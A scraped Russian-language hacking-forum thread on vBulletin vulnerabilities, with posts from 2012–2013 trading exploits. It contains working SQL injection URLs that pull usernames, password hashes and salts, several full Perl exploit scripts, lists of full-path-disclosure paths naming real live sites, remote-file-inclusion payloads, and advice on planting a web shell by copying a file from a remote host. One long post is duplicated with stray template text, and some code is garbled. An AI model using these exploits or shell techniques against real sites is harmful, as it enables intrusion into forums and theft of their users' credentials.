HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #141  
Старый 25.11.2012, 08:27
eman
Guest
Сообщений: n/a
Провел на форуме:
2797

Репутация: 0
По умолчанию

vBulletin ChangUonDyU Advanced Statistics SQL Injection Vulnerability

# Exploit Title: vBulletin ChangUonDyU Advanced Statistics - SQL Injection

Vulnerability

# Google Dork: No Dork

# Date: 19/10/2012

# Exploit Author: Juno_okyo

# Vendor Homepage: http://hoiquantinhoc.com

# Software Link:

http://hoiquantinhoc.com/modifications-3-8-x/4468-changuondyu-advanced-statistics-6-0-1-a.html

# Version: vBulletin 3 & 4

# Tested on: Windows 7

# CVE : http://www.vbulletin.com/

#

################################################## ############################################

Vulnerability:

################################################## ############################################

SQL Injection was found in ChangUonDyU Advanced Statistics.

Query on ajax.php

################################################## ############################################

Exploitation:

################################################## ############################################

ajax.php?do=inforum&listforumid=100) UNION SELECT

1,concat_ws(0x7c,user(),database(),version()),3,4, 5,6,7,8,9,10-- -&result=20

or:

ajax.php?do=inforum&listforumid=100) UNION SELECT

1,2,3,4,5,6,concat_ws(0x7c,username,password,salt) ,8,9,10,11 from user

where userid=1-- -&result=20

################################################## ############################################

Ex:

################################################## ############################################

http://server/f/ajax.php?do=inforum&listforumid=100%29%20UNION%20S ELECT%201,concat_ws%280x7c,user%28%29,database%28% 29,version%28%29%29,3,4,5,6,7,8,9,10--%20-&result=20

################################################## ############################################

More Details:

################################################## ############################################

Website: http://junookyo.blogspot.com/

About Exploit:

http://junookyo.blogspot.com/2012/10/vbb-changuondyu-advanced-statistics-sql.html

################################################## ############################################

Great thanks to James, Juno_okyo & J2TeaM, VNHack Group

################################################## ############################################
 
Ответить с цитированием

  #142  
Старый 17.12.2012, 02:13
n0n@me
Новичок
Регистрация: 19.02.2010
Сообщений: 1
Провел на форуме:
12389

Репутация: 6
По умолчанию

vBulletin 4.2.0 Full Path Disclosure Vulnerability

Код:
Code:
The Full Path Disclosure is vBulletin 4.2.0, in forumrunner. With Full Path Disclosure you can get the path to the forum you're in and also (most of the times is the same) cpanel's username.    
To see it go to:   http://[path]/forumrunner/include/album.php   
It works in 90% of the forums.     

Example: 
http://www.mgcproducts.com/forumrunner/include/album.php http://atheistdiscussion.com/forumrunner/include/album.php http://apolyton.net/forumrunner/include/album.php http://www.romaniancommunity.net/forumrunner/include/album.php http://www.ghosthax.com/forumrunner/include/album.php http://www.reddotcity.net/forumrunner/include/album.php http://www.sevenskins.com/forum/forumrunner/include/album.php http://www.purevb.com/forumrunner/include/album.php http://forum.hackersbrasil.com.br/forumrunner/include/album.php
vBulletin 4.x/5.x multiple Full Puth Disclosure Vuln

Код:
Code:
/includes/api/commonwhitelist_2.php 
/includes/api/commonwhitelist_5.php 
/includes/api/commonwhitelist_6.php 
/includes/api/1/album_album.php 
/includes/api/1/album_editalbum.php 
/includes/api/1/album_latest.php 
/includes/api/1/album_overview.php 
/includes/api/1/album_picture.php 
/includes/api/1/album_user.php 
/includes/api/1/announcement_edit.php 
/includes/api/1/announcement_view.php 
/includes/api/1/api_cmscategorylist.php 
/includes/api/1/api_cmssectionlist.php 
/includes/api/1/api_forumlist.php 
/includes/api/1/api_getnewtop.php 
/includes/api/1/api_getsecuritytoken.php 
/includes/api/1/api_getsessionhash.php 
/includes/api/1/api_init.php 
/includes/api/1/api_mobilepublisher.php 
/includes/api/1/api_usersearch.php 
/includes/api/1/blog_blog.php 
/includes/api/1/blog_bloglist.php 
/includes/api/1/blog_comments.php 
/includes/api/1/blog_custompage.php 
/includes/api/1/blog_dosendtofriend.php 
/includes/api/1/blog_list.php 
/includes/api/1/blog_members.php 
/includes/api/1/blog_post_comment.php 
/includes/api/1/blog_post_editblog.php 
/includes/api/1/blog_post_editcomment.php 
/includes/api/1/blog_post_edittrackback.php 
/includes/api/1/blog_post_newblog.php 
/includes/api/1/blog_post_postcomment.php 
/includes/api/1/blog_post_updateblog.php 
/includes/api/1/blog_sendtofriend.php 
/includes/api/1/blog_subscription_entrylist.php 
/includes/api/1/blog_subscription_userlist.php 
/includes/api/1/blog_usercp_addcat.php 
/includes/api/1/blog_usercp_editcat.php 
/includes/api/1/blog_usercp_editoptions.php 
/includes/api/1/blog_usercp_editprofile.php 
/includes/api/1/blog_usercp_modifycat.php 
/includes/api/1/blog_usercp_updateprofile.php 
/includes/api/1/editpost_editpost.php 
/includes/api/1/editpost_updatepost.php 
/includes/api/1/forum.php 
/includes/api/1/forumdisplay.php 
/includes/api/1/inlinemod_domergeposts.php 
/includes/api/1/list.php 
/includes/api/1/login_lostpw.php 
/includes/api/1/member.php 
/includes/api/1/memberlist_search.php 
/includes/api/1/misc_showattachments.php 
/includes/api/1/misc_whoposted.php 
/includes/api/1/newreply_newreply.php 
/includes/api/1/newreply_postreply.php 
/includes/api/1/newthread_postthread.php 
/includes/api/1/newthread_newthread.php 
/includes/api/1/poll_newpoll.php 
/includes/api/1/poll_polledit.php 
/includes/api/1/poll_showresults.php 
/includes/api/1/private_editfolders.php
/includes/api/1/private_insertpm.php 
/includes/api/1/private_messagelist.php 
/includes/api/1/private_newpm.php 
/includes/api/1/private_showpm.php 
/includes/api/1/private_trackpm.php 
/includes/api/1/profile_editattachments.php 
/includes/api/1/profile_editoptions.php 
/includes/api/1/profile_editprofile.php 
/includes/api/1/register_addmember.php 
/includes/api/1/register_checkdate.php 
/includes/api/1/search_process.php 
/includes/api/1/search_showresults.php 
/includes/api/1/showthread.php 
/includes/api/1/subscription_addsubscription.php 
/includes/api/1/subscription_editfolders.php 
/includes/api/1/subscription_viewsubscription.php 
/includes/api/1/threadtag_managetags.php 
/includes/api/2/album_picture.php 
/includes/api/2/api_blogcategorylist.php 
/includes/api/2/blog_blog.php 
/includes/api/2/blog_bloglist.php 
/includes/api/2/blog_list.php 
/includes/api/2/blog_subscription_entrylist.php 
/includes/api/2/blog_subscription_userlist.php 
/includes/api/2/blog_usercp_groups.php 
/includes/api/2/content.php 
/includes/api/2/editpost_editpost.php 
/includes/api/2/forumdisplay.php 
/includes/api/2/member.php 
/includes/api/2/newreply_newreply.php 
/includes/api/2/forum.php 
/includes/api/2/poll_newpoll.php 
/includes/api/2/poll_polledit.php 
/includes/api/2/poll_showresults.php 
/includes/api/2/private_messagelist.php 
/includes/api/2/private_trackpm.php 
/includes/api/2/profile_editattachments.php 
/includes/api/2/search_showresults.php 
/includes/api/2/showthread.php 
/includes/api/3/api_gotonewpost.php 
/includes/api/4/album_user.php 
/includes/api/4/api_forumlist.php 
/includes/api/4/api_getnewtop.php 
/includes/api/4/breadcrumbs_create.php 
/includes/api/4/facebook_getforumid.php 
/includes/api/4/facebook_getnewforummembers.php 
/includes/api/4/get_vbfromfacebook.php 
/includes/api/4/login_facebook.php 
/includes/api/4/newreply_postreply.php 
/includes/api/4/newthread_postthread.php 
/includes/api/4/register.php 
/includes/api/4/register_addmember.php 
/includes/api/4/search_findusers.php 
/includes/api/4/subscription_viewsubscription.php 
/includes/api/5/api_init.php 
/includes/api/6/api_getnewtop.php 
/includes/api/6/api_gotonewpost.php 
/includes/api/6/content.php 
/includes/api/6/member.php 
/includes/api/6/newthread_newthread.php 
/includes/block/blogentries.php 
/includes/block/cmsarticles.php 
/includes/block/html.php 
/includes/block/newposts.php 
/includes/block/sgdiscussions.php 
/includes/block/tagcloud.php 
/includes/block/threads.php 
/forumrunner/include/subscriptions.php 
/forumrunner/include/search_forum.php 
/forumrunner/include/profile.php 
/forumrunner/include/post.php 
/forumrunner/include/pms.php 
/forumrunner/include/online.php 
/forumrunner/include/moderation.php 
/forumrunner/include/misc.php 
/forumrunner/include/login.php 
/forumrunner/include/get_thread.php 
/forumrunner/include/get_forum.php 
/forumrunner/include/cms.php 
/forumrunner/include/attach.php 
/forumrunner/include/announcement.php 
/forumrunner/include/album.php 
/forumrunner/support/vbulletin_methods.php 
/forumrunner/support/stringparser_bbcode.class.php 
/forumrunner/support/utils.php 
/forumrunner/support/other_methods.php 
/packages/skimlinks/hooks/postbit_display_complete.php 
/packages/skimlinks/hooks/showthread_complete.php 
/packages/skimlinks/hooks/userdata_start.php
//...Leaked bY beBoss..//
 
Ответить с цитированием

  #143  
Старый 23.12.2012, 10:16
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от po[w  
er"]
po[w]er said:
Нужна помощь в заливке шелла.
Создаю плагин с кодом шелла wso, пихаю его в faq_complete, но при выполнении какой-то команды или переходе в папку выдаёт:
Your submission could not be processed because a security token was missing.
If this occurred unexpectedly, please inform the administrator and describe the action you performed before you received this error.
как можно решить эту проблему? Вариант с system($_GET["cmd"]); не подходит тк все функции для выполнения системных команд отключены.
Сталкивался с такой фигнёй. Выкрутился тем, что изменил плагин на один из индексных при заходе на форум, а в качестве php кода указал не получение команд через GPC, а копирование файла с удалённого хоста в нужную папку.
 
Ответить с цитированием

  #144  
Старый 20.01.2013, 08:45
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28262

Репутация: 23
По умолчанию

Цитата:
Сообщение от nicols  
nicols said:
Есть что на vBulletin® Version 3.8.7 ?
На ветке vBulletin 3.8.x присутствует SQL инъекция в файле eggavatar.php, он находится в корневой директории сайта. Если при обращении к site/eggavatar.php сайт выдал не 404 Not Found, то воспользуйтесь сплоитом:

[PHP]
PHP:
[COLOR="#000000"]#!/usr/bin/env perl

useLWP::UserAgent;

sub banner{

print
"###################################\n";

print
"############ DSecurity ############\n";

print
"###################################\n";

print
"# Email:dsecurity.vn[at]gmail.com #\n";

print
"###################################\n";

}

if(@
ARGVnew();

$ua->agent("DSecurity");

$ua->cookie_jar({});

sub login(@){

my $username=shift;

my $password=shift;

my $req=HTTP::Request->new(POST=>$ARGV[0].'/login.php?do=login');

$req->content_type('application/x-www-form-urlencoded');

$req->content("vb_login_username=$username&vb_login_passwor=$password&s=&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login& vb_login_md5password=&vb_login_md5password_utf=");

my $res=$ua->request($req);

}

sub v_request{

#Declare

$print=$_[0];

$select=$_[1];

$from=$_[2];

$where=$_[3];

$limit=$_[4];

$sleep=$ARGV[4];

if (
$from eq'') {$from='information_schema.tables';}

if (
$where eq'') {$where='1';}

if (
$limit eq'') {$limit='0';}

if (
$sleep eq'') {$sleep='10';}



# Create a request

my $req=HTTP::Request->new(POST=>$ARGV[0].'/eggavatar.php');

$req->content_type('application/x-www-form-urlencoded');

$req->content('do=addegg&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar =1'."' and (SELECT 1 FROM(SELECT COUNT(*),CONCAT( (select$selectfrom$fromWHERE$wherelimit$limit,1),FLOOR(RAND(1)*3))foo FROM information_schema .tables GROUP BY foo)a)-- -'&uid=1&pid=1");

# Pass request to the user agent and get a response back

my $res=$ua->request($req);

#print $res->content;

if($res->content=~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)

{
$test= $3};

sleep($sleep);

return
$print.$test."\n";

}

&
banner;

print
"\n############################################### # ############################################# ##### ###########\n";

print
"# EggAvatar for vBulletin 3.8.x SQL Injecti on Vulnerability #\n";

print
"# Date:06-03-2011 #\n";

print
"# Author: DSecurity #\n";

print
"# Software Link: http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #\n";

print
"# Version: 2.3.2 #\n";

print
"# Tested on: vBulletin 3.8.0 #\n";

print
"################################################# # ############################################# ##### #########\n";



#login

login($ARGV[1],$ARGV[2]);

#Foot print

printv_request('MySQL version: ','@@version');

print
v_request('Data dir: ','@@datadir');

print
v_request('User: ','user()');

print
v_request('Database: ','database()');

#Get user

for($i=1;$i[COLOR="#007700"]
 
Ответить с цитированием

  #145  
Старый 10.02.2013, 17:44
warhamer2012
Guest
Сообщений: n/a
Провел на форуме:
11910

Репутация: 0
По умолчанию

Мужики, подскажите насчет vbulletin 4.0.2 Remote File Inclusion

Кто-то пробовал? Все облазил-нашел только следующее

# Exploit :

#

# http://www.site.com/path/includes/class_block.php?classfile=[shell code]

#

# http://www.site.com/path/vb/vb.php?filename=[shell code]

#

# http://www.site.com/path/packages/vbattach/attach.php?include_file=[shell code]


Но не прокатывает на ни на цели, ни на локалке. Что я делаю не так? Или это фейк???
 
Ответить с цитированием

  #146  
Старый 27.02.2013, 15:12
Unknown
Guest
Сообщений: n/a
Провел на форуме:
8705

Репутация: 81
По умолчанию

Недавно искал новый сплоит под vBulletin.

Забрел на сайт 1337day.com и меня заинтересовал следующий топик 0дея:

Код:
Code:
http://1337day.com/exploit/description/20417
Описание гласило:

Цитата:
Сообщение от None  
Код:
Code:
Access to Admincp and Customer area. 

The target forum need to have its install directory available for this exploit to work. /forum/install/upgrade.php 

---------------------------------------- 
Please Enter Your Customer Number 
This is the number with which you log in to the vBulletin.com Members' Area 
---------------------------------------- 

The result is MD5, 
You will need to bruteforce it to get the 12 char uppercase customer number. 
Then you can re-install the forum and access admin area.
Заплатив автору 150$ я получил следующий эксплоит:
vBulletin x.x.x Customer Area 0day
htaccess install dir or delete install dir.
__________________________________________________ __________
# Exploit Title: vBulletin x.x.x Customer Area 0day #
# Author(s): Pixel_death, n3tw0rk, z0ne #
# Perl script coded by n0tch #
# Product: offical software #
# Software Version x.x.x #
# Product Download: http://www.vbulletin.com #
# Google Dork: intext
owered by vBulletin® #
# Demo sites;
# LIVE WORKING DEMO: go to http://vbhacks.info/install/upgrade.php follow the tutorial and decrypt the MD5#
# http://www.vbseo.com/install/upgrade.php #
# http://trove.nla.gov.au/forum/install/upgrade.php #
# http://www.xboxaddict.com/forums/install/upgrade.php #
__________________________________________________ ___________#
This all depends if the upgrade area is still on the forum files, if so you can see the customer number in MD5 by following these simply steps
1st: go to /install/upgrade.php
2nd: view source scroll down to the 300 maybe more and it should look like this #~
Код:
Code:
Unexpected Text:%1$s";
var SETUPTYPE = "upgrade";
var STEP_X_Y = "Step %1$s - %2$s";
var SERVER_NO_RESPONSE = "The server returned no response. This is probably due to a timeout setting. Please contact vBulletin Support for assistance";
//-->
As you can see var CUSTNUMBER = "38405e0bd55eec58330a6af5e960202e"; is there which can be decoded at http://d4tabase.com/forumdisplay.php?f=110 crack my hash section
then log in, reset admin pass and have fun^^
[CODE]
Code:
Auto tool script coded in perl
#!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Request::Common;

system('cls');
system('title vBulletin Install Auto Exploiter');
print "\n ---------------------------------------";
print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
print " ---------------------------------------\n";
print " + d4tabase.com -+- d4tabase.com + ";
print "\n ---------------------------------------\n";
print " coded by n0tch shoutz d4tabase crew ";
print "\n ---------------------------------------\n";

if($#ARGV == -1 or $#ARGV > 0)
{
print "\n usage: ./vBulletin.pl domain (without http://) \n\n";
exit;
}

$domain = $ARGV[0];
$install_dir = "install";
$full_domain = "http://$domain/$install_dir/upgrade.php";
chop($domain);

&search;

sub search
{
$url = $full_domain;
$lwp = LWP::UserAgent->new();
$lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
$request = $lwp->post($url, ["searchHash" => "Search"]);

print " Searching $domain ----\n ";
if ($request->content =~ /CUSTNUMBER = \"(.+)\";/)
{
print "Result : $1\n";
} else {
print "Hash: Hash not found!\n";
}
}
[code]

Shouts to: n0tch, shadow008
На первый взгляд все вроде-бы отлично.
Сплоит оказался не рабочим..Но не беда,быстро переделал на пхп:

Код:

А вот дальше самое интересное!
Захожу на форумы смотрю в папке инсталл фаил upgrade.php вижу в исходниках хэш.
Пробручиваю хэш получаю 12 значное число.
Ввожу в фаиле upgrade.php... форум обнавляется.. Все как в описании , но тут меня постиг первый облом.

После установки ни один из проверенных форумов не предложил сменить пароль.
Вернулся к описанию, "Access to Admincp and Customer area".
Легче от этого не стало:
Цитата:
Сообщение от None  
vbulletin.com/docs/html/main/what_is_memberarea
Цитата:
Members' Area
The Members' Area is a private part of the vBulletin.com site for registered licensed customers. The area is security protected and requires members to enter their customer number and password to again access.
The Members' Area is where you can download vBulletin releases and updates as well as access to additional documentation and resources not publically available.
The Members' Area is currently located at http://members.vbulletin.com.
http://www.vbulletin.com/docs/html/main/what_is_custnum
Цитата:
Customer Number
A customer number is a unique number allocated to everyone who purachses a vBulletin license. The customer number, along with a password is required to access the vBulletin Members' Area.
Для доступа в "Customer area" не достаточно customer number.

[/QUOTE]
" if author else f"
Цитата:
Код:
Code:
Access to Admincp and Customer area. 

The target forum need to have its install directory available for this exploit to work. /forum/install/upgrade.php 

---------------------------------------- 
Please Enter Your Customer Number 
This is the number with which you log in to the vBulletin.com Members' Area 
---------------------------------------- 

The result is MD5, 
You will need to bruteforce it to get the 12 char uppercase customer number. 
Then you can re-install the forum and access admin area.
Заплатив автору 150$ я получил следующий эксплоит:
vBulletin x.x.x Customer Area 0day
htaccess install dir or delete install dir.
__________________________________________________ __________
# Exploit Title: vBulletin x.x.x Customer Area 0day #
# Author(s): Pixel_death, n3tw0rk, z0ne #
# Perl script coded by n0tch #
# Product: offical software #
# Software Version x.x.x #
# Product Download: http://www.vbulletin.com #
# Google Dork: intext
owered by vBulletin® #
# Demo sites;
# LIVE WORKING DEMO: go to http://vbhacks.info/install/upgrade.php follow the tutorial and decrypt the MD5#
# http://www.vbseo.com/install/upgrade.php #
# http://trove.nla.gov.au/forum/install/upgrade.php #
# http://www.xboxaddict.com/forums/install/upgrade.php #
__________________________________________________ ___________#
This all depends if the upgrade area is still on the forum files, if so you can see the customer number in MD5 by following these simply steps
1st: go to /install/upgrade.php
2nd: view source scroll down to the 300 maybe more and it should look like this #~
Код:
Code:
Unexpected Text:%1$s";
var SETUPTYPE = "upgrade";
var STEP_X_Y = "Step %1$s - %2$s";
var SERVER_NO_RESPONSE = "The server returned no response. This is probably due to a timeout setting. Please contact vBulletin Support for assistance";
//-->
As you can see var CUSTNUMBER = "38405e0bd55eec58330a6af5e960202e"; is there which can be decoded at http://d4tabase.com/forumdisplay.php?f=110 crack my hash section
then log in, reset admin pass and have fun^^
[CODE]
Code:
Auto tool script coded in perl
#!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Request::Common;

system('cls');
system('title vBulletin Install Auto Exploiter');
print "\n ---------------------------------------";
print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
print " ---------------------------------------\n";
print " + d4tabase.com -+- d4tabase.com + ";
print "\n ---------------------------------------\n";
print " coded by n0tch shoutz d4tabase crew ";
print "\n ---------------------------------------\n";

if($#ARGV == -1 or $#ARGV > 0)
{
print "\n usage: ./vBulletin.pl domain (without http://) \n\n";
exit;
}

$domain = $ARGV[0];
$install_dir = "install";
$full_domain = "http://$domain/$install_dir/upgrade.php";
chop($domain);

&search;

sub search
{
$url = $full_domain;
$lwp = LWP::UserAgent->new();
$lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
$request = $lwp->post($url, ["searchHash" => "Search"]);

print " Searching $domain ----\n ";
if ($request->content =~ /CUSTNUMBER = \"(.+)\";/)
{
print "Result : $1\n";
} else {
print "Hash: Hash not found!\n";
}
}
[code]

Shouts to: n0tch, shadow008
На первый взгляд все вроде-бы отлично.
Сплоит оказался не рабочим..Но не беда,быстро переделал на пхп:

Код:

А вот дальше самое интересное!
Захожу на форумы смотрю в папке инсталл фаил upgrade.php вижу в исходниках хэш.
Пробручиваю хэш получаю 12 значное число.
Ввожу в фаиле upgrade.php... форум обнавляется.. Все как в описании , но тут меня постиг первый облом.

После установки ни один из проверенных форумов не предложил сменить пароль.
Вернулся к описанию, "Access to Admincp and Customer area".
Легче от этого не стало:
Цитата:
Сообщение от None  
vbulletin.com/docs/html/main/what_is_memberarea
Цитата:
Members' Area
The Members' Area is a private part of the vBulletin.com site for registered licensed customers. The area is security protected and requires members to enter their customer number and password to again access.
The Members' Area is where you can download vBulletin releases and updates as well as access to additional documentation and resources not publically available.
The Members' Area is currently located at http://members.vbulletin.com.
http://www.vbulletin.com/docs/html/main/what_is_custnum
Цитата:
Customer Number
A customer number is a unique number allocated to everyone who purachses a vBulletin license. The customer number, along with a password is required to access the vBulletin Members' Area.
Для доступа в "Customer area" не достаточно customer number.

[/QUOTE]
 
Ответить с цитированием

  #147  
Старый 27.02.2013, 15:18
Unknown
Guest
Сообщений: n/a
Провел на форуме:
8705

Репутация: 81
По умолчанию

Эксплоит оказался не рабочим, но что-то делать было нужно.

Мой вгляд пал на только что обновленную булку до версии: 4.1.5

Код:
Code:
mmoru.com
Зарегистрировавшись , я обратил внимание что на самом сайте стоит движек vBuletin на котором возможно писать статьи.

Проверяя переменные наткнулся на sq-injection , как в последствии оказалось присущюю всем vbulletin 4.1.5.

Название: Уязвимость в vBulletin 4.1.5

Dork: Powered by Powered by vBulletin 4.1.5

Условия: Аккаунт на форуме. Разрешение на прикрепление файлов к сообщениям/темам (attachments)

Регистрируемся -> заходим на форум -> жмем создать тему или если стоит борд, то можно выбрать создать статью (второй вариант чаще срабатывал) -> в самом низу ищем Вложения "Управление вложениями" -> Открываем окно и в параметр "values[f]" вставляем наш SQL запрос.

Пример:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]:

[/
COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1

[/COLOR][/COLOR
После чего видим стандартную ошибку БД форума, следовательно открываем исходный код страницы и видим:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][/COLOR
С вами были Piv8Team (priv8.ru)
 
Ответить с цитированием

  #148  
Старый 28.03.2013, 00:46
Ups
Guest
Сообщений: n/a
Провел на форуме:
42754

Репутация: 0
По умолчанию

vBulletin 5 Beta XX SQLi 0day

Код:
Code:
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
+===================================================+
|           vBulletin 5 Beta XX SQLi 0day           |
|              Author: Orestis Kourides             |
|             Web Site: www.cyitsec.net             |
+===================================================+
";
 
if (@ARGV != 5) {
    print "\r\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";
    exit;
}
 
$host		= $ARGV[0];
$path		= $ARGV[1];
$username	= $ARGV[2];
$password	= $ARGV[3];
$magicnum	= $ARGV[4];
$encpath	= encode_base64('http://'.$host.$path);
print "[+] Logging\n";
print "[+] Username: ".$username."\n";
print "[+] Password: ".$password."\n";
print "[+] MagicNum: ".$magicnum."\n";
print "[+] " .$host.$path."auth/login\n";
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
    [
		'url' => $encpath,
		'username' => $username,
		'password' => $password,
	],
	Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
	User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requesting\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
		'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1=1',
	],
	User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$data = $response->content;
if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };
print "\n";
exit 1;
 
Ответить с цитированием

  #149  
Старый 20.10.2013, 10:13
Oro4imaru
Guest
Сообщений: n/a
Провел на форуме:
4616

Репутация: 0
По умолчанию

vBulletin® Version 4.1.5

http://www.youtube.com/watch?v=k9xe55gq2fc
 
Ответить с цитированием

  #150  
Старый 11.11.2013, 01:10
wauffmannn
Guest
Сообщений: n/a
Провел на форуме:
355

Репутация: 0
По умолчанию

Обход ограничений безопасности в vBulletin

Дата публикации: 10.10.2013

Дата изменения: 10.10.2013

Всего просмотров: 1104

Опасность: Высокая

Наличие исправления: Инстуркции по устранению

Количество уязвимостей: 1

CVSSv2 рейтинг: (AV:N/AC:L/Au:N/C/I/A/E:H/RL:W/RC:C) = Base:7.5/Temporal:7.1

CVE ID: Нет данных

Вектор эксплуатации: Удаленная

Воздействие: Обход ограничений безопасности

CWE ID: Нет данных

Наличие эксплоита: Активная эксплуатация уязвимости

Уязвимые продукты: vBulletin 4.x

vBulletin 5.x

Уязвимые версии: vBulletin версии 4.x, 5.x

Описание:

Уязвимость позволяет удаленному пользователю получить административный доступ к приложению.

Уязвимость существует из-за неизвестной ошибки в сценарии /install/upgrade.php. Удаленный пользователь может с помощью специально сформированного запроса создать новую административную учетную запись и получить полный контроль над приложением.

Уязвимость активно эксплуатируется в настоящее время.

URL производителя: http://www.vbulletin.com/

Решение: Способов устранения уязвимости не существует в настоящее время. В качестве временно решения производитель рекомендует удалить установочные директории /install/ или /core/install/.

Ссылки:

http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5

http://www.vbulletin.org/forum/showthread.php?p=2443431

где взять POC?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
В ядре Linux появляется все больше уязвимостей dinar_007 Мировые новости. Обсуждения. 18 26.01.2007 16:21



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ